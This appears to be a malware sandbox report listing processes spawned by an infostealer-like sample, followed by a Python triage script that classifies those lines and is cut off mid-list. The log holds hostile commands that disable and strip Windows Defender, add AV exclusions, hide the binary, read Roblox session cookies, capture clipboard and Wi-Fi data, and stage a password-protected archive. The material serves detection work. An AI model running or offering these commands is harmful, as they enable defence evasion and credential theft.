                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DEF.tmp" "c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe "C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeProcess created: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeProcess created: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeProcess created: C:\Users\Public\Netstat\FuturreApp.exe "C:\Users\Public\Netstat\FuturreApp.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeProcess created: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe"
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe "C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe"
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe "C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe "C:\Users\user\AppData\Local\Temp\1017900001\d188864e84.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hostsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DEF.tmp" "c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe""Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Users\user\AppData\Local\Temp\1017855001\8ZVMneG.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2sopuet\l2sopuet.cmdline"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2DEF.tmp" "c:\Users\user\AppData\Local\Temp\l2sopuet\CSC2774EC596431493C9BAB8956CFD3669.TMP"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                                Source: C:\Users\user\AppData\Local\Temp\1017871001\m9sfEU9.exeProcess created: C:\Users\Public\Netstat\FuturreApp.exe "C:\Users\Public\Netstat\FuturreApp.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                Source: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exeProcess created: C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe "C:\Users\user\AppData\Local\Temp\1017899001\d0ef52de9f.exe"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe C:\Users\user\AppData\Local\Temp\_MEI51602\rar.exe a -r -hp"yeezy222" "C:\Users\user\AppData\Local\Temp\vLqBW.zip" *
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
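As an added example, not part of the Joe Sandbox report, a small triage script that parses process-creation lines in the shape used above ("Source: <parent> Process created: <child> <command line>") and maps the command lines to the behaviours this report flags: Defender tampering via Set-MpPreference, Add-MpPreference -ExclusionPath and MpCmdRun -RemoveDefinitions, the attrib toggle on the hosts file, Wi-Fi profile enumeration, clipboard capture, AV enumeration through SecurityCenter2, the .ROBLOSECURITY registry read, password-protected archive staging with rar.exe, and the PowerShell-to-csc.exe compile chain. The sample lines are constructed copies of lines from this section (the encoded PowerShell payload is omitted, as on the page); the rule names are mine, not Joe Sandbox signature names, and the parser accepts both the spaced form and the fused "exeProcess created:" form the page was extracted with.

```python
import re
from collections import Counter

# Constructed sample: copies of process-creation lines from this report, in both the
# spaced form and the fused "exeProcess created:" form as the page was extracted.
# The encoded PowerShell payload is omitted, as it is on the page.
SAMPLE_LINES = [
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend',
    r"Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\1017853001\D1UL0FG.exe'",
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile',
    r'Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard',
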